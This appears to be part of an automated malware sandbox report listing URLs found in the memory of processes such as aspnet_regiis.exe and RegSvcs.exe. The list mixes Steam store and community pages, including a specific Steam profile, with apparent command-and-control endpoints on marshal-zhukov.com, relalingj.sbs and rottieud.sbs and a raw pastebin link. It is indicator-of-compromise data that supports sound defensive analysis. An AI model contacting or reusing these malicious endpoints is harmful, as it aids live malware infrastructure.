                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Installer.exe, 0000001F.00000002.1912432871.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comM
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1721867399.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499365497.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.c
                Source: aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1721867399.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499365497.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.c#b
                Source: aspnet_regiis.exe, 00000008.00000003.1589140688.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618412925.000000000295F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760859556.000000000293A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1675312671.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1667673144.0000000002935000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645485892.000000000295C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1668985231.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1704276197.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1761053365.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618010358.0000000002935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/
                Source: aspnet_regiis.exe, 00000008.00000003.1704166428.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760643273.000000000295A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/&&
                Source: aspnet_regiis.exe, 00000008.00000003.1589055516.0000000002934000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1589140688.0000000002936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/:
                Source: aspnet_regiis.exe, 00000008.00000003.1646851786.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647706451.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645741913.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647006571.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1667749798.000000000293A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645578502.0000000002935000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647801568.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645960083.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1704436019.000000000293A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1646498354.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647439452.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1646729840.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647095515.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1646084375.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1646390714.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1675312671.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1667673144.0000000002935000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1646276375.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647208910.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647345197.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1647558990.0000000002936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/Z
                Source: aspnet_regiis.exe, 00000008.00000002.1816099745.0000000002925000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1645388472.000000000296A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1668985231.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1704276197.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1675190257.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1529819200.0000000002925000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1617880981.000000000296A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/api
                Source: aspnet_regiis.exe, 00000008.00000003.1760915716.0000000002925000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816099745.0000000002925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apie
                Source: aspnet_regiis.exe, 00000007.00000003.1526820402.0000000002E97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apig
                Source: aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804574864.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799857013.0000000002ECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apim
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804443688.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apion
                Source: aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1721867399.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804443688.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apiz
                Source: aspnet_regiis.exe, 00000008.00000003.1645578502.0000000002935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/b
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804443688.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/b9
                Source: aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/kI
                Source: aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com:443/api
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: powershell.exe, 00000024.00000002.1940781262.00000000062E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: RegSvcs.exe, 00000021.00000002.1979634479.000000000241E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000021.00000002.1979634479.000000000242C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                Source: RegSvcs.exe, 00000021.00000002.1979634479.000000000247D000.00000004.00000800.00020000.00000000.sdmp, logs.uce1.33.dr, logs.uce0.33.dr, logs.uce.33.drString found in binary or memory: https://pastebin.com/raw/dq3hWX27
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relalingj.sbs/
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relalingj.sbs/api
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relalingj.sbs/apis
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/api
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apibs
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, Installer.exe.29.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drString found in binary or memory: https://sectigo.com/CPS0
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: aspnet_regiis.exe, 00000008.00000003.1499115102.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaiz
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: aspnet_regiis.exe, 0000000A.00000003.1506903568.000000000292E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000292E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/IIcQ
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: aspnet_regiis.exe, 00000008.00000003.1499115102.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1507136747.0000000002922000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507875244.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: aspnet_regiis.exe, 0000000A.00000003.1507136747.0000000002922000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507875244.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319005N
                Source: aspnet_regiis.exe, 00000007.00000003.1479717905.0000000002E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/re
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: aspnet_regiis.exe, 00000008.00000003.1499115102.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-Auth
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1507136747.000000000294B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C129b19db70bc2b7
                Source: aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
